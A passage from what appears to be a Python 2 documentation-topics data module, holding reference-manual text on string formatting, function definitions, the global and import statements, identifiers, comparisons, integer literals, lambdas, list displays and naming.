"\'f\'". |\n +-----------+------------------------------------------------------------+\n | "\'g\'" | General format. For a given precision "p >= 1", this |\n | | rounds the number to "p" significant digits and then |\n | | formats the result in either fixed-point format or in |\n | | scientific notation, depending on its magnitude. The |\n | | precise rules are as follows: suppose that the result |\n | | formatted with presentation type "\'e\'" and precision "p-1" |\n | | would have exponent "exp". Then if "-4 <= exp < p", the |\n | | number is formatted with presentation type "\'f\'" and |\n | | precision "p-1-exp". Otherwise, the number is formatted |\n | | with presentation type "\'e\'" and precision "p-1". In both |\n | | cases insignificant trailing zeros are removed from the |\n | | significand, and the decimal point is also removed if |\n | | there are no remaining digits following it. Positive and |\n | | negative infinity, positive and negative zero, and nans, |\n | | are formatted as "inf", "-inf", "0", "-0" and "nan" |\n | | respectively, regardless of the precision. A precision of |\n | | "0" is treated as equivalent to a precision of "1". The |\n | | default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\'G\'" | General format. Same as "\'g\'" except switches to "\'E\'" if |\n | | the number gets too large. The representations of infinity |\n | | and NaN are uppercased, too. |\n +-----------+------------------------------------------------------------+\n | "\'n\'" | Number. This is the same as "\'g\'", except that it uses the |\n | | current locale setting to insert the appropriate number |\n | | separator characters. |\n +-----------+------------------------------------------------------------+\n | "\'%\'" | Percentage. Multiplies the number by 100 and displays in |\n | | fixed ("\'f\'") format, followed by a percent sign. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\'g\'". 
|\n +-----------+------------------------------------------------------------+\n\n\nFormat examples\n===============\n\nThis section contains examples of the new format syntax and comparison\nwith the old "%"-formatting.\n\nIn most of the cases the syntax is similar to the old "%"-formatting,\nwith the addition of the "{}" and with ":" used instead of "%". For\nexample, "\'%03.2f\'" can be translated to "\'{:03.2f}\'".\n\nThe new format syntax also supports new and different options, shown\nin the follow examples.\n\nAccessing arguments by position:\n\n >>> \'{0}, {1}, {2}\'.format(\'a\', \'b\', \'c\')\n \'a, b, c\'\n >>> \'{}, {}, {}\'.format(\'a\', \'b\', \'c\') # 2.7+ only\n \'a, b, c\'\n >>> \'{2}, {1}, {0}\'.format(\'a\', \'b\', \'c\')\n \'c, b, a\'\n >>> \'{2}, {1}, {0}\'.format(*\'abc\') # unpacking argument sequence\n \'c, b, a\'\n >>> \'{0}{1}{0}\'.format(\'abra\', \'cad\') # arguments\' indices can be repeated\n \'abracadabra\'\n\nAccessing arguments by name:\n\n >>> \'Coordinates: {latitude}, {longitude}\'.format(latitude=\'37.24N\', longitude=\'-115.81W\')\n \'Coordinates: 37.24N, -115.81W\'\n >>> coord = {\'latitude\': \'37.24N\', \'longitude\': \'-115.81W\'}\n >>> \'Coordinates: {latitude}, {longitude}\'.format(**coord)\n \'Coordinates: 37.24N, -115.81W\'\n\nAccessing arguments\' attributes:\n\n >>> c = 3-5j\n >>> (\'The complex number {0} is formed from the real part {0.real} \'\n ... \'and the imaginary part {0.imag}.\').format(c)\n \'The complex number (3-5j) is formed from the real part 3.0 and the imaginary part -5.0.\'\n >>> class Point(object):\n ... def __init__(self, x, y):\n ... self.x, self.y = x, y\n ... def __str__(self):\n ... return \'Point({self.x}, {self.y})\'.format(self=self)\n ...\n >>> str(Point(4, 2))\n \'Point(4, 2)\'\n\nAccessing arguments\' items:\n\n >>> coord = (3, 5)\n >>> \'X: {0[0]}; Y: {0[1]}\'.format(coord)\n \'X: 3; Y: 5\'\n\nReplacing "%s" and "%r":\n\n >>> "repr() shows quotes: {!r}; str() doesn\'t: {!s}".format(\'test1\', \'test2\')\n "repr() shows quotes: \'test1\'; str() doesn\'t: test2"\n\nAligning the text and specifying a width:\n\n >>> \'{:<30}\'.format(\'left aligned\')\n \'left aligned \'\n >>> \'{:>30}\'.format(\'right aligned\')\n \' right aligned\'\n >>> \'{:^30}\'.format(\'centered\')\n \' centered \'\n >>> \'{:*^30}\'.format(\'centered\') # use \'*\' as a fill char\n \'***********centered***********\'\n\nReplacing "%+f", "%-f", and "% f" and specifying a sign:\n\n >>> \'{:+f}; {:+f}\'.format(3.14, -3.14) # show it always\n \'+3.140000; -3.140000\'\n >>> \'{: f}; {: f}\'.format(3.14, -3.14) # show a space for positive numbers\n \' 3.140000; -3.140000\'\n >>> \'{:-f}; {:-f}\'.format(3.14, -3.14) # show only the minus -- same as \'{:f}; {:f}\'\n \'3.140000; -3.140000\'\n\nReplacing "%x" and "%o" and converting the value to different bases:\n\n >>> # format also supports binary numbers\n >>> "int: {0:d}; hex: {0:x}; oct: {0:o}; bin: {0:b}".format(42)\n \'int: 42; hex: 2a; oct: 52; bin: 101010\'\n >>> # with 0x, 0o, or 0b as prefix:\n >>> "int: {0:d}; hex: {0:#x}; oct: {0:#o}; bin: {0:#b}".format(42)\n \'int: 42; hex: 0x2a; oct: 0o52; bin: 0b101010\'\n\nUsing the comma as a thousands separator:\n\n >>> \'{:,}\'.format(1234567890)\n \'1,234,567,890\'\n\nExpressing a percentage:\n\n >>> points = 19.5\n >>> total = 22\n >>> \'Correct answers: {:.2%}\'.format(points/total)\n \'Correct answers: 88.64%\'\n\nUsing type-specific formatting:\n\n >>> import datetime\n >>> d = datetime.datetime(2010, 7, 4, 12, 15, 58)\n >>> \'{:%Y-%m-%d 
%H:%M:%S}\'.format(d)\n \'2010-07-04 12:15:58\'\n\nNesting arguments and more complex examples:\n\n >>> for align, text in zip(\'<^>\', [\'left\', \'center\', \'right\']):\n ... \'{0:{fill}{align}16}\'.format(text, fill=align, align=align)\n ...\n \'left<<<<<<<<<<<<\'\n \'^^^^^center^^^^^\'\n \'>>>>>>>>>>>right\'\n >>>\n >>> octets = [192, 168, 0, 1]\n >>> \'{:02X}{:02X}{:02X}{:02X}\'.format(*octets)\n \'C0A80001\'\n >>> int(_, 16)\n 3232235521\n >>>\n >>> width = 5\n >>> for num in range(5,12):\n ... for base in \'dXob\':\n ... print \'{0:{width}{base}}\'.format(num, base=base, width=width),\n ... print\n ...\n 5 5 5 101\n 6 6 6 110\n 7 7 7 111\n 8 8 10 1000\n 9 9 11 1001\n 10 A 12 1010\n 11 B 13 1011\n', 'function': u'\nFunction definitions\n********************\n\nA function definition defines a user-defined function object (see\nsection The standard type hierarchy):\n\n decorated ::= decorators (classdef | funcdef)\n decorators ::= decorator+\n decorator ::= "@" dotted_name ["(" [argument_list [","]] ")"] NEWLINE\n funcdef ::= "def" funcname "(" [parameter_list] ")" ":" suite\n dotted_name ::= identifier ("." identifier)*\n parameter_list ::= (defparameter ",")*\n ( "*" identifier ["," "**" identifier]\n | "**" identifier\n | defparameter [","] )\n defparameter ::= parameter ["=" expression]\n sublist ::= parameter ("," parameter)* [","]\n parameter ::= identifier | "(" sublist ")"\n funcname ::= identifier\n\nA function definition is an executable statement. Its execution binds\nthe function name in the current local namespace to a function object\n(a wrapper around the executable code for the function). This\nfunction object contains a reference to the current global namespace\nas the global namespace to be used when the function is called.\n\nThe function definition does not execute the function body; this gets\nexecuted only when the function is called. [3]\n\nA function definition may be wrapped by one or more *decorator*\nexpressions. Decorator expressions are evaluated when the function is\ndefined, in the scope that contains the function definition. The\nresult must be a callable, which is invoked with the function object\nas the only argument. The returned value is bound to the function name\ninstead of the function object. Multiple decorators are applied in\nnested fashion. For example, the following code:\n\n @f1(arg)\n @f2\n def func(): pass\n\nis equivalent to:\n\n def func(): pass\n func = f1(arg)(f2(func))\n\nWhen one or more top-level *parameters* have the form *parameter* "="\n*expression*, the function is said to have "default parameter values."\nFor a parameter with a default value, the corresponding *argument* may\nbe omitted from a call, in which case the parameter\'s default value is\nsubstituted. If a parameter has a default value, all following\nparameters must also have a default value --- this is a syntactic\nrestriction that is not expressed by the grammar.\n\n**Default parameter values are evaluated when the function definition\nis executed.** This means that the expression is evaluated once, when\nthe function is defined, and that the same "pre-computed" value is\nused for each call. This is especially important to understand when a\ndefault parameter is a mutable object, such as a list or a dictionary:\nif the function modifies the object (e.g. by appending an item to a\nlist), the default value is in effect modified. This is generally not\nwhat was intended. 
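The effect is easy to demonstrate interactively (a minimal illustration; the\nnames "f", "a" and "L" below are arbitrary):\n\n >>> def f(a, L=[]):\n ... L.append(a)\n ... return L\n ...\n >>> f(1)\n [1]\n >>> f(2)\n [1, 2]\n\nThe list bound to "L" is created once, when the "def" statement is executed,\nand is shared by every call that omits the argument.\n\n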
A way around this is to use "None" as the\ndefault, and explicitly test for it in the body of the function, e.g.:\n\n def whats_on_the_telly(penguin=None):\n if penguin is None:\n penguin = []\n penguin.append("property of the zoo")\n return penguin\n\nFunction call semantics are described in more detail in section Calls.\nA function call always assigns values to all parameters mentioned in\nthe parameter list, either from positional arguments, from keyword\narguments, or from default values. If the form ""*identifier"" is\npresent, it is initialized to a tuple receiving any excess positional\nparameters, defaulting to the empty tuple. If the form\n""**identifier"" is present, it is initialized to a new dictionary\nreceiving any excess keyword arguments, defaulting to a new empty\ndictionary.\n\nIt is also possible to create anonymous functions (functions not bound\nto a name), for immediate use in expressions. This uses lambda\nexpressions, described in section Lambdas. Note that the lambda\nexpression is merely a shorthand for a simplified function definition;\na function defined in a ""def"" statement can be passed around or\nassigned to another name just like a function defined by a lambda\nexpression. The ""def"" form is actually more powerful since it\nallows the execution of multiple statements.\n\n**Programmer\'s note:** Functions are first-class objects. A ""def""\nform executed inside a function definition defines a local function\nthat can be returned or passed around. Free variables used in the\nnested function can access the local variables of the function\ncontaining the def. See section Naming and binding for details.\n', 'global': u'\nThe "global" statement\n**********************\n\n global_stmt ::= "global" identifier ("," identifier)*\n\nThe "global" statement is a declaration which holds for the entire\ncurrent code block. It means that the listed identifiers are to be\ninterpreted as globals. It would be impossible to assign to a global\nvariable without "global", although free variables may refer to\nglobals without being declared global.\n\nNames listed in a "global" statement must not be used in the same code\nblock textually preceding that "global" statement.\n\nNames listed in a "global" statement must not be defined as formal\nparameters or in a "for" loop control target, "class" definition,\nfunction definition, or "import" statement.\n\n**CPython implementation detail:** The current implementation does not\nenforce the latter two restrictions, but programs should not abuse\nthis freedom, as future implementations may enforce them or silently\nchange the meaning of the program.\n\n**Programmer\'s note:** the "global" statement is a directive to the parser. It\napplies only to code parsed at the same time as the "global"\nstatement. In particular, a "global" statement contained in an "exec"\nstatement does not affect the code block *containing* the "exec"\nstatement, and code contained in an "exec" statement is unaffected by\n"global" statements in the code containing the "exec" statement. The\nsame applies to the "eval()", "execfile()" and "compile()" functions.\n', 'id-classes': u'\nReserved classes of identifiers\n*******************************\n\nCertain classes of identifiers (besides keywords) have special\nmeanings. These classes are identified by the patterns of leading and\ntrailing underscore characters:\n\n"_*"\n Not imported by "from module import *". 
The special identifier "_"\n is used in the interactive interpreter to store the result of the\n last evaluation; it is stored in the "__builtin__" module. When\n not in interactive mode, "_" has no special meaning and is not\n defined. See section The import statement.\n\n Note: The name "_" is often used in conjunction with\n internationalization; refer to the documentation for the\n "gettext" module for more information on this convention.\n\n"__*__"\n System-defined names. These names are defined by the interpreter\n and its implementation (including the standard library). Current\n system names are discussed in the Special method names section and\n elsewhere. More will likely be defined in future versions of\n Python. *Any* use of "__*__" names, in any context, that does not\n follow explicitly documented use, is subject to breakage without\n warning.\n\n"__*"\n Class-private names. Names in this category, when used within the\n context of a class definition, are re-written to use a mangled form\n to help avoid name clashes between "private" attributes of base and\n derived classes. See section Identifiers (Names).\n', 'identifiers': u'\nIdentifiers and keywords\n************************\n\nIdentifiers (also referred to as *names*) are described by the\nfollowing lexical definitions:\n\n identifier ::= (letter|"_") (letter | digit | "_")*\n letter ::= lowercase | uppercase\n lowercase ::= "a"..."z"\n uppercase ::= "A"..."Z"\n digit ::= "0"..."9"\n\nIdentifiers are unlimited in length. Case is significant.\n\n\nKeywords\n========\n\nThe following identifiers are used as reserved words, or *keywords* of\nthe language, and cannot be used as ordinary identifiers. They must\nbe spelled exactly as written here:\n\n and del from not while\n as elif global or with\n assert else if pass yield\n break except import print\n class exec in raise\n continue finally is return\n def for lambda try\n\nChanged in version 2.4: "None" became a constant and is now recognized\nby the compiler as a name for the built-in object "None". Although it\nis not a keyword, you cannot assign a different object to it.\n\nChanged in version 2.5: Using "as" and "with" as identifiers triggers\na warning. To use them as keywords, enable the "with_statement"\nfuture feature .\n\nChanged in version 2.6: "as" and "with" are full keywords.\n\n\nReserved classes of identifiers\n===============================\n\nCertain classes of identifiers (besides keywords) have special\nmeanings. These classes are identified by the patterns of leading and\ntrailing underscore characters:\n\n"_*"\n Not imported by "from module import *". The special identifier "_"\n is used in the interactive interpreter to store the result of the\n last evaluation; it is stored in the "__builtin__" module. When\n not in interactive mode, "_" has no special meaning and is not\n defined. See section The import statement.\n\n Note: The name "_" is often used in conjunction with\n internationalization; refer to the documentation for the\n "gettext" module for more information on this convention.\n\n"__*__"\n System-defined names. These names are defined by the interpreter\n and its implementation (including the standard library). Current\n system names are discussed in the Special method names section and\n elsewhere. More will likely be defined in future versions of\n Python. *Any* use of "__*__" names, in any context, that does not\n follow explicitly documented use, is subject to breakage without\n warning.\n\n"__*"\n Class-private names. 
Names in this category, when used within the\n context of a class definition, are re-written to use a mangled form\n to help avoid name clashes between "private" attributes of base and\n derived classes. See section Identifiers (Names).\n', 'if': u'\nThe "if" statement\n******************\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n', 'imaginary': u'\nImaginary literals\n******************\n\nImaginary literals are described by the following lexical definitions:\n\n imagnumber ::= (floatnumber | intpart) ("j" | "J")\n\nAn imaginary literal yields a complex number with a real part of 0.0.\nComplex numbers are represented as a pair of floating point numbers\nand have the same restrictions on their range. To create a complex\nnumber with a nonzero real part, add a floating point number to it,\ne.g., "(3+4j)". Some examples of imaginary literals:\n\n 3.14j 10.j 10j .001j 1e100j 3.14e-10j\n', 'import': u'\nThe "import" statement\n**********************\n\n import_stmt ::= "import" module ["as" name] ( "," module ["as" name] )*\n | "from" relative_module "import" identifier ["as" name]\n ( "," identifier ["as" name] )*\n | "from" relative_module "import" "(" identifier ["as" name]\n ( "," identifier ["as" name] )* [","] ")"\n | "from" module "import" "*"\n module ::= (identifier ".")* identifier\n relative_module ::= "."* module | "."+\n name ::= identifier\n\nImport statements are executed in two steps: (1) find a module, and\ninitialize it if necessary; (2) define a name or names in the local\nnamespace (of the scope where the "import" statement occurs). The\nstatement comes in two forms differing on whether it uses the "from"\nkeyword. The first form (without "from") repeats these steps for each\nidentifier in the list. The form with "from" performs step (1) once,\nand then performs step (2) repeatedly.\n\nTo understand how step (1) occurs, one must first understand how\nPython handles hierarchical naming of modules. To help organize\nmodules and provide a hierarchy in naming, Python has a concept of\npackages. A package can contain other packages and modules while\nmodules cannot contain other modules or packages. From a file system\nperspective, packages are directories and modules are files.\n\nOnce the name of the module is known (unless otherwise specified, the\nterm "module" will refer to both packages and modules), searching for\nthe module or package can begin. The first place checked is\n"sys.modules", the cache of all modules that have been imported\npreviously. If the module is found there then it is used in step (2)\nof import.\n\nIf the module is not found in the cache, then "sys.meta_path" is\nsearched (the specification for "sys.meta_path" can be found in **PEP\n302**). The object is a list of *finder* objects which are queried in\norder as to whether they know how to load the module by calling their\n"find_module()" method with the name of the module. 
If the module\nhappens to be contained within a package (as denoted by the existence\nof a dot in the name), then a second argument to "find_module()" is\ngiven as the value of the "__path__" attribute from the parent package\n(everything up to the last dot in the name of the module being\nimported). If a finder can find the module it returns a *loader*\n(discussed later) or returns "None".\n\nIf none of the finders on "sys.meta_path" are able to find the module\nthen some implicitly defined finders are queried. Implementations of\nPython vary in what implicit meta path finders are defined. The one\nthey all do define, though, is one that handles "sys.path_hooks",\n"sys.path_importer_cache", and "sys.path".\n\nThe implicit finder searches for the requested module in the "paths"\nspecified in one of two places ("paths" do not have to be file system\npaths). If the module being imported is supposed to be contained\nwithin a package then the second argument passed to "find_module()",\n"__path__" on the parent package, is used as the source of paths. If\nthe module is not contained in a package then "sys.path" is used as\nthe source of paths.\n\nOnce the source of paths is chosen it is iterated over to find a\nfinder that can handle that path. The dict at\n"sys.path_importer_cache" caches finders for paths and is checked for\na finder. If the path does not have a finder cached then\n"sys.path_hooks" is searched by calling each object in the list with a\nsingle argument of the path, returning a finder or raising\n"ImportError". If a finder is returned then it is cached in\n"sys.path_importer_cache" and then used for that path entry. If no\nfinder can be found but the path exists then a value of "None" is\nstored in "sys.path_importer_cache" to signify that an implicit, file-\nbased finder that handles modules stored as individual files should be\nused for that path. If the path does not exist then a finder which\nalways returns "None" is placed in the cache for the path.\n\nIf no finder can find the module then "ImportError" is raised.\nOtherwise some finder returned a loader whose "load_module()" method\nis called with the name of the module to load (see **PEP 302** for the\noriginal definition of loaders). A loader has several responsibilities\nto perform on a module it loads. First, if the module already exists\nin "sys.modules" (a possibility if the loader is called outside of the\nimport machinery) then it is to use that module for initialization and\nnot a new module. But if the module does not exist in "sys.modules"\nthen it is to be added to that dict before initialization begins. If\nan error occurs during loading of the module and it was added to\n"sys.modules" it is to be removed from the dict. If an error occurs\nbut the module was already in "sys.modules" it is left in the dict.\n\nThe loader must set several attributes on the module. "__name__" is to\nbe set to the name of the module. "__file__" is to be the "path" to\nthe file unless the module is built-in (and thus listed in\n"sys.builtin_module_names") in which case the attribute is not set. If\nwhat is being imported is a package then "__path__" is to be set to a\nlist of paths to be searched when looking for modules and packages\ncontained within the package being imported. "__package__" is optional\nbut should be set to the name of the package that contains the module or\npackage (the empty string is used for a module not contained in a\npackage). 
"__loader__" is also optional but should be set to the\nloader object that is loading the module.\n\nIf an error occurs during loading then the loader raises "ImportError"\nif some other exception is not already being propagated. Otherwise the\nloader returns the module that was loaded and initialized.\n\nWhen step (1) finishes without raising an exception, step (2) can\nbegin.\n\nThe first form of "import" statement binds the module name in the\nlocal namespace to the module object, and then goes on to import the\nnext identifier, if any. If the module name is followed by "as", the\nname following "as" is used as the local name for the module.\n\nThe "from" form does not bind the module name: it goes through the\nlist of identifiers, looks each one of them up in the module found in\nstep (1), and binds the name in the local namespace to the object thus\nfound. As with the first form of "import", an alternate local name\ncan be supplied by specifying ""as" localname". If a name is not\nfound, "ImportError" is raised. If the list of identifiers is\nreplaced by a star ("\'*\'"), all public names defined in the module are\nbound in the local namespace of the "import" statement..\n\nThe *public names* defined by a module are determined by checking the\nmodule\'s namespace for a variable named "__all__"; if defined, it must\nbe a sequence of strings which are names defined or imported by that\nmodule. The names given in "__all__" are all considered public and\nare required to exist. If "__all__" is not defined, the set of public\nnames includes all names found in the module\'s namespace which do not\nbegin with an underscore character ("\'_\'"). "__all__" should contain\nthe entire public API. It is intended to avoid accidentally exporting\nitems that are not part of the API (such as library modules which were\nimported and used within the module).\n\nThe "from" form with "*" may only occur in a module scope. If the\nwild card form of import --- "import *" --- is used in a function and\nthe function contains or is a nested block with free variables, the\ncompiler will raise a "SyntaxError".\n\nWhen specifying what module to import you do not have to specify the\nabsolute name of the module. When a module or package is contained\nwithin another package it is possible to make a relative import within\nthe same top package without having to mention the package name. By\nusing leading dots in the specified module or package after "from" you\ncan specify how high to traverse up the current package hierarchy\nwithout specifying exact names. One leading dot means the current\npackage where the module making the import exists. Two dots means up\none package level. Three dots is up two levels, etc. So if you execute\n"from . import mod" from a module in the "pkg" package then you will\nend up importing "pkg.mod". If you execute "from ..subpkg2 import mod"\nfrom within "pkg.subpkg1" you will import "pkg.subpkg2.mod". The\nspecification for relative imports is contained within **PEP 328**.\n\n"importlib.import_module()" is provided to support applications that\ndetermine which modules need to be loaded dynamically.\n\n\nFuture statements\n=================\n\nA *future statement* is a directive to the compiler that a particular\nmodule should be compiled using syntax or semantics that will be\navailable in a specified future release of Python. The future\nstatement is intended to ease migration to future versions of Python\nthat introduce incompatible changes to the language. 
It allows use of\nthe new features on a per-module basis before the release in which the\nfeature becomes standard.\n\n future_statement ::= "from" "__future__" "import" feature ["as" name]\n ("," feature ["as" name])*\n | "from" "__future__" "import" "(" feature ["as" name]\n ("," feature ["as" name])* [","] ")"\n feature ::= identifier\n name ::= identifier\n\nA future statement must appear near the top of the module. The only\nlines that can appear before a future statement are:\n\n* the module docstring (if any),\n\n* comments,\n\n* blank lines, and\n\n* other future statements.\n\nThe features recognized by Python 2.6 are "unicode_literals",\n"print_function", "absolute_import", "division", "generators",\n"nested_scopes" and "with_statement". "generators", "with_statement" and\n"nested_scopes" are redundant in Python version 2.6 and above because\nthey are always enabled.\n\nA future statement is recognized and treated specially at compile\ntime: Changes to the semantics of core constructs are often\nimplemented by generating different code. It may even be the case\nthat a new feature introduces new incompatible syntax (such as a new\nreserved word), in which case the compiler may need to parse the\nmodule differently. Such decisions cannot be pushed off until\nruntime.\n\nFor any given release, the compiler knows which feature names have\nbeen defined, and raises a compile-time error if a future statement\ncontains a feature not known to it.\n\nThe direct runtime semantics are the same as for any import statement:\nthere is a standard module "__future__", described later, and it will\nbe imported in the usual way at the time the future statement is\nexecuted.\n\nThe interesting runtime semantics depend on the specific feature\nenabled by the future statement.\n\nNote that there is nothing special about the statement:\n\n import __future__ [as name]\n\nThat is not a future statement; it\'s an ordinary import statement with\nno special semantics or syntax restrictions.\n\nCode compiled by an "exec" statement or calls to the built-in\nfunctions "compile()" and "execfile()" that occur in a module "M"\ncontaining a future statement will, by default, use the new syntax or\nsemantics associated with the future statement. This can, starting\nwith Python 2.2, be controlled by optional arguments to "compile()" ---\nsee the documentation of that function for details.\n\nA future statement typed at an interactive interpreter prompt will\ntake effect for the rest of the interpreter session. If an\ninterpreter is started with the "-i" option, is passed a script name\nto execute, and the script includes a future statement, it will be in\neffect in the interactive session started after the script is\nexecuted.\n\nSee also:\n\n **PEP 236** - Back to the __future__\n The original proposal for the __future__ mechanism.\n', 'in': u'\nComparisons\n***********\n\nUnlike C, all comparison operations in Python have the same priority,\nwhich is lower than that of any arithmetic, shifting or bitwise\noperation. 
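For example, "1 + 1 == 2" is parsed as "(1 + 1) == 2", because\ncomparison binds less tightly than "+":\n\n >>> 1 + 1 == 2\n True\n\n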
Also unlike C, expressions like "a < b < c" have the\ninterpretation that is conventional in mathematics:\n\n comparison ::= or_expr ( comp_operator or_expr )*\n comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n | "is" ["not"] | ["not"] "in"\n\nComparisons yield boolean values: "True" or "False".\n\nComparisons can be chained arbitrarily, e.g., "x < y <= z" is\nequivalent to "x < y and y <= z", except that "y" is evaluated only\nonce (but in both cases "z" is not evaluated at all when "x < y" is\nfound to be false).\n\nFormally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\nopN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\nthat each expression is evaluated at most once.\n\nNote that "a op1 b op2 c" doesn\'t imply any kind of comparison between\n*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\nperhaps not pretty).\n\nThe forms "<>" and "!=" are equivalent; for consistency with C, "!="\nis preferred; where "!=" is mentioned below "<>" is also accepted.\nThe "<>" spelling is considered obsolescent.\n\nThe operators "<", ">", "==", ">=", "<=", and "!=" compare the values\nof two objects. The objects need not have the same type. If both are\nnumbers, they are converted to a common type. Otherwise, objects of\ndifferent types *always* compare unequal, and are ordered consistently\nbut arbitrarily. You can control comparison behavior of objects of\nnon-built-in types by defining a "__cmp__" method or rich comparison\nmethods like "__gt__", described in section Special method names.\n\n(This unusual definition of comparison was used to simplify the\ndefinition of operations like sorting and the "in" and "not in"\noperators. In the future, the comparison rules for objects of\ndifferent types are likely to change.)\n\nComparison of objects of the same type depends on the type:\n\n* Numbers are compared arithmetically.\n\n* Strings are compared lexicographically using the numeric\n equivalents (the result of the built-in function "ord()") of their\n characters. Unicode and 8-bit strings are fully interoperable in\n this behavior. [4]\n\n* Tuples and lists are compared lexicographically using comparison\n of corresponding elements. This means that to compare equal, each\n element must compare equal and the two sequences must be of the same\n type and have the same length.\n\n If not equal, the sequences are ordered the same as their first\n differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n the same as "cmp(x,y)". If the corresponding element does not\n exist, the shorter sequence is ordered first (for example, "[1,2] <\n [1,2,3]").\n\n* Mappings (dictionaries) compare equal if and only if their sorted\n (key, value) lists compare equal. [5] Outcomes other than equality\n are resolved consistently, but are not otherwise defined. [6]\n\n* Most other objects of built-in types compare unequal unless they\n are the same object; the choice whether one object is considered\n smaller or larger than another one is made arbitrarily but\n consistently within one execution of a program.\n\nThe operators "in" and "not in" test for collection membership. "x in\ns" evaluates to true if *x* is a member of the collection *s*, and\nfalse otherwise. "x not in s" returns the negation of "x in s". 
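For example:\n\n >>> 3 in [1, 2, 3]\n True\n >>> \'x\' not in \'abc\'\n True\n\n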
The\ncollection membership test has traditionally been bound to sequences;\nan object is a member of a collection if the collection is a sequence\nand contains an element equal to that object. However, it makes sense\nfor many other object types to support membership tests without being\na sequence. In particular, dictionaries (for keys) and sets support\nmembership testing.\n\nFor the list and tuple types, "x in y" is true if and only if there\nexists an index *i* such that "x == y[i]" is true.\n\nFor the Unicode and string types, "x in y" is true if and only if *x*\nis a substring of *y*. An equivalent test is "y.find(x) != -1".\nNote, *x* and *y* need not be the same type; consequently, "u\'ab\' in\n\'abc\'" will return "True". Empty strings are always considered to be a\nsubstring of any other string, so """ in "abc"" will return "True".\n\nChanged in version 2.3: Previously, *x* was required to be a string of\nlength "1".\n\nFor user-defined classes which define the "__contains__()" method, "x\nin y" is true if and only if "y.__contains__(x)" is true.\n\nFor user-defined classes which do not define "__contains__()" but do\ndefine "__iter__()", "x in y" is true if some value "z" with "x == z"\nis produced while iterating over "y". If an exception is raised\nduring the iteration, it is as if "in" raised that exception.\n\nLastly, the old-style iteration protocol is tried: if a class defines\n"__getitem__()", "x in y" is true if and only if there is a non-\nnegative integer index *i* such that "x == y[i]", and all lower\ninteger indices do not raise an "IndexError" exception. (If any other\nexception is raised, it is as if "in" raised that exception).\n\nThe operator "not in" is defined to have the inverse true value of\n"in".\n\nThe operators "is" and "is not" test for object identity: "x is y" is\ntrue if and only if *x* and *y* are the same object. "x is not y"\nyields the inverse truth value. [7]\n', 'integers': u'\nInteger and long integer literals\n*********************************\n\nInteger and long integer literals are described by the following\nlexical definitions:\n\n longinteger ::= integer ("l" | "L")\n integer ::= decimalinteger | octinteger | hexinteger | bininteger\n decimalinteger ::= nonzerodigit digit* | "0"\n octinteger ::= "0" ("o" | "O") octdigit+ | "0" octdigit+\n hexinteger ::= "0" ("x" | "X") hexdigit+\n bininteger ::= "0" ("b" | "B") bindigit+\n nonzerodigit ::= "1"..."9"\n octdigit ::= "0"..."7"\n bindigit ::= "0" | "1"\n hexdigit ::= digit | "a"..."f" | "A"..."F"\n\nAlthough both lower case "\'l\'" and upper case "\'L\'" are allowed as\nsuffix for long integers, it is strongly recommended to always use\n"\'L\'", since the letter "\'l\'" looks too much like the digit "\'1\'".\n\nPlain integer literals that are above the largest representable plain\ninteger (e.g., 2147483647 when using 32-bit arithmetic) are accepted\nas if they were long integers instead. [1] There is no limit for long\ninteger literals apart from what can be stored in available memory.\n\nSome examples of plain integer literals (first row) and long integer\nliterals (second and third rows):\n\n 7 2147483647 0177\n 3L 79228162514264337593543950336L 0377L 0x100000000L\n 79228162514264337593543950336 0xdeadbeef\n', 'lambda': u'\nLambdas\n*******\n\n lambda_expr ::= "lambda" [parameter_list]: expression\n old_lambda_expr ::= "lambda" [parameter_list]: old_expression\n\nLambda expressions (sometimes called lambda forms) have the same\nsyntactic position as expressions. 
They are a shorthand to create\nanonymous functions; the expression "lambda arguments: expression"\nyields a function object. The unnamed object behaves like a function\nobject defined with\n\n def name(arguments):\n return expression\n\nSee section Function definitions for the syntax of parameter lists.\nNote that functions created with lambda expressions cannot contain\nstatements.\n', 'lists': u'\nList displays\n*************\n\nA list display is a possibly empty series of expressions enclosed in\nsquare brackets:\n\n list_display ::= "[" [expression_list | list_comprehension] "]"\n list_comprehension ::= expression list_for\n list_for ::= "for" target_list "in" old_expression_list [list_iter]\n old_expression_list ::= old_expression [("," old_expression)+ [","]]\n old_expression ::= or_test | old_lambda_expr\n list_iter ::= list_for | list_if\n list_if ::= "if" old_expression [list_iter]\n\nA list display yields a new list object. Its contents are specified\nby providing either a list of expressions or a list comprehension.\nWhen a comma-separated list of expressions is supplied, its elements\nare evaluated from left to right and placed into the list object in\nthat order. When a list comprehension is supplied, it consists of a\nsingle expression followed by at least one "for" clause and zero or\nmore "for" or "if" clauses. In this case, the elements of the new\nlist are those that would be produced by considering each of the "for"\nor "if" clauses a block, nesting from left to right, and evaluating\nthe expression to produce a list element each time the innermost block\nis reached [1].\n', 'naming': u'\nNaming and binding\n******************\n\n*Names* refer to objects. Names are introduced by name binding\noperations. Each occurrence of a name in the program text refers to\nthe *binding* of that name established in the innermost function block\ncontaining the use.\n\nA *block* is a piece of Python program text that is executed as a\nunit. The following are blocks: a module, a function body, and a class\ndefinition. Each command typed interactively is a block. A script\nfile (a file given as standard input to the interpreter or specified\nas the first argument on the interpreter command line) is a code block.\nA script command (a command specified on the interpreter command line\nwith the \'**-c**\' option) is a code block. The file read by the\nbuilt-in function "execfile()" is a code block. The string argument\npassed to the built-in function "eval()" and to the "exec" statement\nis a code block. The expression read and evaluated by the built-in\nfunction "input()" is a code block.\n\nA code block is executed in an *execution frame*. A frame contains\nsome administrative information (used for debugging) and determines\nwhere and how execution continues after the code block\'s execution has\ncompleted.\n\nA *scope* defines the visibility of a name within a block. If a local\nvariable is defined in a block, its scope includes that block. If the\ndefinition occurs in a function block, the scope extends to any blocks\ncontained within the defining one, unless a contained block introduces\na different binding for the name. The scope of names defined in a\nclass block is limited to the 